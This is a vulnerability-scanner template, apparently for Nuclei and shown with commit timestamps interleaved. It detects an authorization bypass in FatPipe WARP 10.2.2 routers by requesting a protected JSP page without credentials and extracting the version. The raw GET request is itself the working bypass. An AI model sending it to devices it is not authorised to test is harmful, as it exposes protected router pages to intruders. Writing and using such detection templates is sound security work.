2021-09-30 11:48:21 +00:00
id : fatpipe-auth-bypass
2021-09-30 02:07:24 +00:00
info :
2022-10-19 21:11:27 +00:00
name : FatPipe WARP 10.2.2 - Authorization Bypass
2021-09-30 02:07:24 +00:00
author : gy741
severity : high
2022-10-19 21:11:27 +00:00
description : FatPipe WARP 10.2.2 contains an authorization bypass vulnerability. Improper access control occurs when the application provides direct access to objects based on user-supplied input. As a result, an attacker can bypass proper authorization and access resources behind protected pages.
2021-09-30 02:07:24 +00:00
reference :
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5682.php
2021-09-30 11:48:21 +00:00
- https://www.fatpipeinc.com/support/advisories.php
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-10-14 11:27:55 +00:00
tags : fatpipe,auth-bypass,router
2021-09-30 02:07:24 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-09-30 02:07:24 +00:00
- raw :
- |
GET /fpui/jsp/index.jsp HTTP/1.1
Host : {{Hostname}}
Accept : */*
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
- "productType"
- "type:"
- "version:"
2021-09-30 11:48:21 +00:00
- "<title>FatPipe Networks</title>"
2021-09-30 02:07:24 +00:00
condition : and
2021-09-30 11:48:21 +00:00
extractors :
- type : regex
part : body
regex :
- 'version : "([0-9.a-z]+)" '
2023-10-19 13:13:52 +00:00
# digest: 4a0a00473045022100d1edc48e65ce1c70eb9bace16c5bcd95326c7db7e6e46ce8d3dd077774c7b5b6022051350553635bcf5ed8bd71299dc6e198acde0bf60a878b29c8e1ba5e21a30866:922c64590222798bb761d5b6d8e72950